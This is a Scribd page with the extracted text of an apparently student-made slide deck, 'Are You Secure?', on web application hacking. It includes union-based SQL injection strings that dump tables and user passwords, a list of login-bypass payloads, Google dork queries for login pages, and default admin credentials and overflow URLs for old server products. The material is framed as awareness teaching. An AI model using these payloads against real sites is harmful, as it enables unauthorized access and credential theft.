Scribd Logo
Upload

Welcome to Scribd!

  • Are Secure ??? Introduction

    Uploaded by

    Windu Gata
    21 views28 pages
    You have to know how they crack your web site. So You can make your website safe

    Original Title

    Are Secure ??? introduction

    Copyright

    © © All Rights Reserved

    Available Formats

    PPTX, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    You have to know how they crack your web site. So You can make your website safe

    Copyright:

    © All Rights Reserved
    Download as PPTX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    21 views28 pages

    Are Secure ??? Introduction

    Uploaded by

    Windu Gata
    You have to know how they crack your web site. So You can make your website safe

    Copyright:

    © All Rights Reserved
    Download as PPTX, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    of 28

    Are You Secure ?

    Team :
    -

    Septema Umna Maulida

    (1312530247)

    Ronny Tanjung

    Wirawan Satyadi

    (1311530230)

    Muhammad Fahmi

    (1312530148)

    Fajar Agung Rizki

    (1311530404)

    Bayu Laksono

    Mai Gani Tamim

    Rian Nurjaman

    Husein Allmasyhur

    Rudi Fredrick

    (1311530263)

    (1311530396)
    (1311530107)
    (1311530123)
    (1311530214)
    (0911530335)

    Web Application Hacking

    Typical Web Application set-up


    HTTP
    request
    (cleartext
    or SSL)
    Web
    Client

    SQL
    Database

    Firewall

    Web app

    Web
    Server

    Web app
    Web app

    DB

    DB

    Web app

    HTTP reply
    (HTML,
    Javascript,
    VBscript,
    etc)

    Apache
    IIS
    Netscape
    etc

    Plugins:
    Perl
    C/C++
    JSP, etc

    Database
    connection:
    ADO,
    ODBC, etc.

    Utility of Firewalls
    Hacks on OS
    network services
    prevented by
    firewalls.

    Web app

    Web
    Server
    wu-ftpd

    X
    Sun RPC
    X

    NT ipc$

    Web app
    Web app
    Web app

    DB

    DB

    Firewalls cannot prevent

    Web
    Client

    Web
    Server

    URL Interpretation
    Attacks.
    web server
    misconfiguration

    Firewalls cannot prevent

    Web app

    Web
    Client

    Web
    Server

    Web app
    Web app
    Web app

    Input Validation
    attacks.
    URL
    Interpretation
    attacks

    poor
    checking
    of user
    inputs

    Firewalls cannot prevent

    Web app

    Web
    Client

    Web
    Server

    Web app
    Web app

    DB

    DB

    Web app

    SQL Query
    Poisoning
    URL
    Interpretation
    attacks

    Input
    Validation
    attacks

    Extend SQL
    statements

    Firewalls cannot prevent


    Reverseengineering
    HTTP cookies.
    Web app

    Web
    Client

    Web
    Server

    Web app
    Web app

    DB

    DB

    Web app

    HTTP session
    hijacking.
    Impersonation.

    URL
    Interpretation
    attacks

    Input
    Validation
    attacks

    SQL query
    poisoning

    URL Injection

    Client Side

    URL :
    http://localhost/ronie/uas/index.php?
    status=detail&id=40

    Server Side
    $ID = $_GET['id'];
    $hasil = mysql_query("SELECT * FROM news WHERE ID = $ID order
    by id desc");

    CONTOH QUERY URL


    INJECTION
    Syntax : union select all 1,table_name,3,4,5,6 from
    information_schema.tables where table_schema=database()- Untuk Melihat nama-nama tabel di dalam database
    Syntax : union select all
    1,group_concat(column_name),3,4,5,6 from
    information_schema.columns where
    table_schema=database()- Untuk melihat isi field dari tiap tabel
    Syntax : union select all
    1,group_concat(IDLogin,0x3a,Pass),3,4,5,6 from userweb- Untuk melihat isi record dari tabel userweb

    URL Injection

    Client Side

    URL :
    http://localhost/ronie/uas/index.php?status=detail&id=40 union select all
    1,table_name,3,4,5,6 from information_schema.tables where
    table_schema=database()--

    Server Side
    SELECT * FROM news WHERE ID = 40 union select all
    1,table_name,3,4,5,6 from information_schema.tables where
    table_schema=database()-- order by id desc

    SQL Injection

    Web Login Page


    Username:

    MySQL Application

    Bob

    Password: MyPass123

    Intern
    Intern
    et
    et
    APACHE Server

    login_script2.php

    Select * from
    User_Table
    where
    user=%user
    and
    pass=%pass

    My SQL Server
    Select * from
    User_Table where
    user=Bob
    and
    pass=MyPass123

    M
    Y
    S
    Q
    L
    L
    I
    B
    R
    A
    R
    Y

    Web Login Page

    MySQL Injection

    Username: or 1=1--

    My SQL Server

    Password:

    Intern
    Intern
    et
    et

    APACHE Server

    login_script2.php
    Select * from
    User_Table
    where
    user=%user
    and
    pass=%pass

    Select * from
    User_Table
    where
    users= or
    1=1-- and
    pass=

    M
    Y
    S
    Q
    L
    L
    I
    B
    R
    A
    R
    Y

    Login box

    A common query:
    SELECT * from table WHERE id=$id
    We could inject some malicious query in this
    way:
    http://www.host.com/file?
    id="malicious_code"

    Play with SQL Injection :


    inurl:login.php
    index of:/admin/login.php
    index of login.php

    Inject queries variations :


    admin'--

    ' or 'x'='x

    " or "a"="a

    hi') or ('a'='a

    ' or 0=0 --

    " or "x"="x

    ') or ('a'='a

    hi") or ("a"="a

    " or 0=0 --

    ') or ('x'='x

    ") or ("a"="a

    or 0=0 --

    ' or 1=1--

    hi" or "a"="a

    ' or 0=0 #

    " or 1=1--

    hi" or 1=1 --

    " or 0=0 #

    or 1=1--

    hi' or 1=1 --

    or 0=0 #

    ' or a=a--

    hi' or 'a'='a

    Directory Browsing

    Directory Browsing

    Application Default

    Application Default

    Application Default
    Printer Buffer Overflow
    http://www.zzzz.com /null.printer
    FrontPage Server Extensions Buffer Overflow
    http://www.zzzz.com /_vti_bin/_vti_aut/fp30reg.dll
    Compaq Insight Manager (CIM)
    http://www.zzzz.com:2301
    username:password
    administratror:administrator
    administrator:[Null]
    operator:operator
    Statistics
    /usage, /stat, /webstat, /wwwstats

    Search Queries

    Search
    Queries

    THE END

    You might also like